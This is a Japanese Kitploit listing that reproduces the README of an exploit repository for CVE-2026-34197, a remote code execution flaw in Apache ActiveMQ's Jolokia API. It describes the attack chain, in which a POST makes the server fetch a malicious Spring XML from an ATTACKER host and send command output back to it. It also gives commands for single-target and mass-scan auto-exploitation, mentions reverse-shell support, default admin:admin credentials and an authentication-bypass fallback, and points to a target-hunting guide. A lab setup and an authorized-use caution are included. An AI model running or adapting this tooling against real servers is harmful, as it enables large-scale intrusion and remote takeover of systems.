Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-34197 — Apache ActiveMQ の Jolokia API を介した RCE のエクスプロイト(CVE-2026-34197)。コマンド出力のキャプチャ、大量スキャン、自動エクスプロイトに対応。 | Kitploit
ツール/GitHubGitHub/kondordevsecuritycorp/cve-2026-34197
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングラボと実践
GitHubkondordevsecuritycorp/cve-2026-34197

CVE-2026-34197

Apache ActiveMQ の Jolokia API を介した RCE のエクスプロイト(CVE-2026-34197)。コマンド出力のキャプチャ、大量スキャン、自動エクスプロイトに対応。

リポジトリを見る
21155ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-34197 CVSS 9.8 RCE Python 3.8+

Apache ActiveMQ Jolokia Spring

CVE-2026-34197

Jolokia API を介した Apache ActiveMQ のリモートコード実行

Author Stars Forks Issues License

概要 • 詳細 • 攻撃フロー • クイックスタート • ATTACKER_IP ガイド • 使用方法 • 出力キャプチャ • スキャナー • ハンティング • 検出 • 対策


概要

CVE-2026-34197 は、Apache ActiveMQ Classic における重大なリモートコード実行(RCE)脆弱性であり、認証済みの攻撃者が Web コンソールで公開されている Jolokia API を介して任意のオペレーティングシステムコマンドを実行できるものです。

この脆弱性は 13 年以上 にわたって存在しており、Jolokia(HTTP-JMX ブリッジ)、ActiveMQ MBeans、ネットワークコネクタ、および VM トランスポート間の相互作用に起因します。

[!CAUTION] これは KONDOR DEV SECURITY によって開発された 最初の公開 PoC です。認可されたセキュリティ評価でのみ使用してください。

主な機能

  • コマンド出力キャプチャ — 単純なコマンド(id、whoami、cat /etc/passwd)の出力がターミナルに自動的に表示されます
  • 自動 base64 ラッピング — リバースシェルや特殊文字が手動エスケープなしで動作します
  • 2 フェーズスキャナー(version_check.py)— マルチスレッドによるバージョン検出 + 対象を絞った悪用
  • 認証フォールバック — 認証情報が失敗した場合に自動的に認証なしを試行します(CVE-2024-32114)
  • スマートブローカー検出 — Jolokia ワイルドカードクエリを介してブローカー名を自動検出します

脆弱性の詳細

CVE IDCVE-2026-34197
深刻度 CVSS 3.1
タイプリモートコード実行(RCE)
CWECWE-20(不適切な入力検証)/ CWE-94(コードインジェクション)
影響を受けるバージョンActiveMQ Classic < 5.19.4 および 6.0.0 — 6.2.2
修正済みバージョン5.19.4 / 6.2.3
認証が必要はい(デフォルト認証情報 admin:admin が一般的です)
認証不要6.0.0 — 6.1.1(CVE-2024-32114 による)
デフォルトポート8161(Web コンソール)

攻撃フロー```

                CVE-2026-34197 — Exploitation Chain

──────────────────────────────────────────────────────────────

ATTACKER ACTIVEMQ SERVER ──────── ─────────────── │ │ [1] │── POST /api/jolokia/ ──────────────────>│ │ addNetworkConnector( │ │ vm://rce?brokerConfig= │ │ xbean:http://ATTACKER/payload.xml) │ │ │ │ [2] │── Creates VM broker │ │── Fetches remote XML │ │ [3] │<── GET /payload.xml ─────────────────────│ │── Serves malicious Spring XML ─────────>│ │ │ │ [4] │── Spring instantiates beans │ │── Runtime.exec(COMMAND) │ │── ** RCE ACHIEVED ** │ │ [5] │<── POST /output (command stdout) ────────│ (auto, for simple commands) │── Displays command output │ │ │

### ステップバイステップの内訳

| ステップ | アクション | コンポーネント |
|:----:|--------|-----------|
| **1** | 攻撃者が `/api/jolokia/` にPOSTを送信し、Broker MBean上で `addNetworkConnector` を呼び出す | Jolokia API |
| **2** | ActiveMQが `vm://` トランスポートURIを処理し、`brokerConfig` がリモートURLを指す一時的なブローカーを作成する | VMトランスポート |
| **3** | `xbean:` スキームが、攻撃者のサーバーからのSpring XML設定ファイルのダウンロードをトリガーする | Spring / XBean |
| **4** | SpringがXML内のすべてのBeanをインスタンス化し、その中には `Runtime.getRuntime().exec()` を呼び出すものも含まれる | Springコンテキスト |
| **5** | 単純なコマンドの場合、出力がキャプチャされ、HTTP POST経由で攻撃者のリスナーに送り返される(自動) | 出力キャプチャ |

---

## プロジェクト構造```
CVE-2026-34197/
├── exploit.py             # PoC exploit (single target + mass scan)
├── version_check.py       # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│   └── template.xml       # Spring XML payload template
├── targets.txt            # Target URLs (one per line)
├── docker/
│   └── docker-compose.yml # Vulnerable lab environment
├── docs/
│   ├── HUNTING_GUIDE_EN.md  # Target hunting guide (English)
│   └── HUNTING_GUIDE_ES.md  # Guía de búsqueda (Español)
├── LICENSE
└── README.md

クイックスタート

前提条件```bash

Python 3.8+ required

pip install requests

### ラボ環境(Docker)```bash
cd docker
docker-compose up -d
# ActiveMQ Classic 5.18.6 (vulnerable) → localhost:8161

エクスプロイトを実行する```bash

Single target

python exploit.py -t http://TARGET:8161 -l YOUR_IP -c "id"

Mass scan from file

python exploit.py -T targets.txt -l YOUR_IP -c "id"

### スキャナー + 自動エクスプロイト(大量のターゲットに推奨)```bash
# Scan only — detect versions, no exploitation
python version_check.py -T targets.txt

# Scan + auto-exploit vulnerable targets
python version_check.py -T targets.txt -l YOUR_IP -c "id"

ATTACKER_IP(-l / --lhost)について

-l(または --lhost)パラメータは、エクスプロイトが機能するために極めて重要です。これは、悪意のあるSpring XMLペイロードを配信するためにあなたのマシンが使用するIPアドレスを指定します。ターゲットのActiveMQサーバーは、ペイロードをダウンロードするために、ネットワーク経由でこのIPに到達できる必要があります。

ATTACKER_IPとは何か?

ツールをダウンロード